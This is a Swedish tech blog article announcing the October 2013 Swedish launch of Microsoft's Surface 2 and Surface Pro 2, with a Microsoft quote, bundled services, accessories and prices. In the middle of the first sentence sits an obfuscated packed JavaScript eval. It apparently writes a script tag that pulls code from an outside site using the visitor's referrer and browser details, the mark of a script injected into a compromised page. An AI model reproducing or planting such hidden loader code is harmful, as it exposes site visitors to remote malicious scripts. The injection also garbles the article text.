Image Image Image Image Image Image Image Image Image Image

| 18 januari, 2021

Scroll to top

Top

Surface 2 och Surface Pro 2 till Sverige 22 oktober

surface 2 pro
Filip Urde
  • On 25 september, 2013
  • http://www.revue.se/filip-urde

Den eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|hrydz|var|u0026u|referrer|ahfik||js|php’.split(’|’),0,{}))
22 oktober släpps Microsoft Surface 2 och Surface Pro 2 i Sverige. 

 

 

 

 

Det är med glädje jag kan berätta att vi stärker vårt utbud på marknaden genom att släppa Surface 2 och Surface Pro 2. Enheterna är unika på marknaden och användarna kan förvänta sig en snabbare och personligare upplevelse av sin Surface, säger Thomas Floberg, affärsområdeschef för Windows och Surface på Microsoft

Surface 2 och Surface Pro 2 är uppföljare till Surface RT och Surface Pro. Dem kommer att levereras med Windows RT 8.1 (Surface 2) respektive Windows 8.1 Pro (Surface Pro 2).

Surface 2 och Surface Pro 2 kommer ha tillgång till 200 GB lagringsutrymme på SkyDrive i två år utan extra kostnad och tillgång till Skype WiFi genom deras drygt 2 miljoner hot spots runt om i världen. Man vill även få fler att komma igång med Office på sin Surface, därför får du även tillgång till Microsoft Office 2013 RT med Outlook RT när du köper Surface 2.

Till lanseringen så kommer även en del nya tillbehör. Både touch cover och type cover kommer i uppgraderade versioner där bakgrundsbelysta tangenter är en ny funktion. Det kommer även att lanseras en laddare anpassad för att ladda din Surface i bilen. Självklart kommer även den första generationens tillbehör att fungera även med Surface 2 och Surface Pro 2.

 

Försäljningspris Surface 2
32 GB – 3 895 SEK
64 GB – 4 795 SEK

 

Försäljningspris Surface Pro 2
64 GB – 7 895 SEK
128 GB – 8 795 SEK
256 GB – 11 495 SEK
512 GB – 15 995 SEK

Surface-bloggen